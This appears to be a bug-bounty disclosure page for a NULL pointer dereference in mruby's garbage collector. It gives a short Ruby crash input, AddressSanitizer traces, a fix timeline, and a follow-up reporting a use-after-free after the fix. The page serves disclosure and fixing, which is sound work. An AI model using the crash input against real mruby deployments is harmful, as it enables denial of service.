NULL Pointer Dereference in mruby/mruby

Status: Valid
Reported on: Dec 10th 2021

Description

NULL Pointer Dereference in mrb_full_gc

Proof of Concept

( *a = () )
a.<<.take_while{ a.drop_while {Enumerable ; a<<lambda {}}}

Result

./master/asan_mruby/bin/mirb ./crash.rb
mirb - Embeddable Interactive Ruby Shell

 => nil
AddressSanitizer:DEADLYSIGNAL
=================================================================
==21352==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x556b44382444 bp 0x7fff4e9961d0 sp 0x7fff4e9961b0 T0)
==21352==The signal is caused by a READ memory access.
==21352==Hint: address points to the zero page.
    #0 0x556b44382443 in mrb_full_gc /root/master/asan_mruby/src/gc.c:1317
    #1 0x556b4438276b in mrb_garbage_collect /root/master/asan_mruby/src/gc.c:1350
    #2 0x556b44386737 in mrb_irep_incref /root/master/asan_mruby/src/state.c:114
    #3 0x556b4444780a in mrb_proc_copy /root/master/asan_mruby/src/proc.c:213
    #4 0x556b44448162 in proc_lambda /root/master/asan_mruby/src/proc.c:284
    #5 0x556b4439f98c in mrb_vm_exec /root/master/asan_mruby/src/vm.c:1637
    #6 0x556b44391018 in mrb_vm_run /root/master/asan_mruby/src/vm.c:1091
    #7 0x556b443034eb in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:670
    #8 0x7f192ee230b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #9 0x556b4430048d in _start (/root/master/asan_mruby/bin/mirb+0xbe48d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/master/asan_mruby/src/gc.c:1317 in mrb_full_gc
==21352==ABORTING
Timeline

We are processing your report and will contact the mruby team within 24 hours. (a year ago)
We have contacted a member of the mruby team and are waiting to hear back. (a year ago)
Yukihiro "Matz" Matsumoto validated this vulnerability. (a year ago)
felling good man has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
Yukihiro "Matz" Matsumoto marked this as fixed in 3.1 with commit f5e10c. (a year ago)
Yukihiro "Matz" Matsumoto has been awarded the fix bounty.
This vulnerability will not receive a CVE.

felling (Researcher), a year ago:

Hi @Matz, Looks like your fix is incomplete.

mruby/bin/mirb test.rb
mirb - Embeddable Interactive Ruby Shell

 => nil
too many irep references (RuntimeError)
=================================================================
==4326==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a6 at pc 0x555880ee8b49 bp 0x7ffd45311cb0 sp 0x7ffd45311ca0
READ of size 1 at 0x6070000003a6 thread T0
    #0 0x555880ee8b48 in mrb_irep_cutref /root/master/asan_mruby/src/state.c:138
    #1 0x555880ee2170 in obj_free /root/master/asan_mruby/src/gc.c:871
    #2 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
    #3 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
    #4 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
    #5 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
    #6 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #7 0x555880e6248d in _start (/root/master/asan_mruby/bin/mirb+0xbf48d)

0x6070000003a6 is located 6 bytes inside of 72-byte region [0x6070000003a0,0x6070000003e8)
freed by thread T0 here:
    #0 0x7fa03caf47cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf)
    #1 0x555880ee87a3 in mrb_default_allocf /root/master/asan_mruby/src/state.c:64
    #2 0x555880edeb69 in mrb_free /root/master/asan_mruby/src/gc.c:288
    #3 0x555880ee9198 in mrb_irep_free /root/master/asan_mruby/src/state.c:174
    #4 0x555880ee8af7 in mrb_irep_decref /root/master/asan_mruby/src/state.c:128
    #5 0x555880ee2183 in obj_free /root/master/asan_mruby/src/gc.c:873
    #6 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
    #7 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
    #8 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
    #9 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
    #10 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

previously allocated by thread T0 here:
    #0 0x7fa03caf4ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe)
    #1 0x555880ee87bd in mrb_default_allocf /root/master/asan_mruby/src/state.c:68
    #2 0x555880ede83e in mrb_realloc_simple /root/master/asan_mruby/src/gc.c:226
    #3 0x555880ede940 in mrb_realloc /root/master/asan_mruby/src/gc.c:240
    #4 0x555880edea2d in mrb_malloc /root/master/asan_mruby/src/gc.c:256
    #5 0x555880ee931a in mrb_add_irep /root/master/asan_mruby/src/state.c:208
    #6 0x555880f69f00 in scope_add_irep /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3641
    #7 0x555880f6a361 in scope_new /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3671
    #8 0x555880f592b8 in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1294
    #9 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #10 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #11 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #12 0x555880f5b006 in gen_values /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1563
    #13 0x555880f5ba5c in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1668
    #14 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #15 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #16 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
    #17 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #18 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #19 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #20 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #21 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
    #22 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #23 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #24 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #25 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #26 0x555880f5a801 in scope_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1473
    #27 0x555880f612ae in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2494
    #28 0x555880f6c43d in generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3888
    #29 0x555880f6c815 in mrb_generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3911

SUMMARY: AddressSanitizer: heap-use-after-free /root/master/asan_mruby/src/state.c:138 in mrb_irep_cutref
==4326==ABORTING
Robert Scott, 9 months ago:

@matz can confirm this is still not fixed in 3.1.0-rc2

Robert Scott, 9 months ago:

^ Disregard this. What presumably happened is the followup to this became https://huntr.dev/bounties/59a70392-4864-4ce3-8e35-6ac2111d1e2e/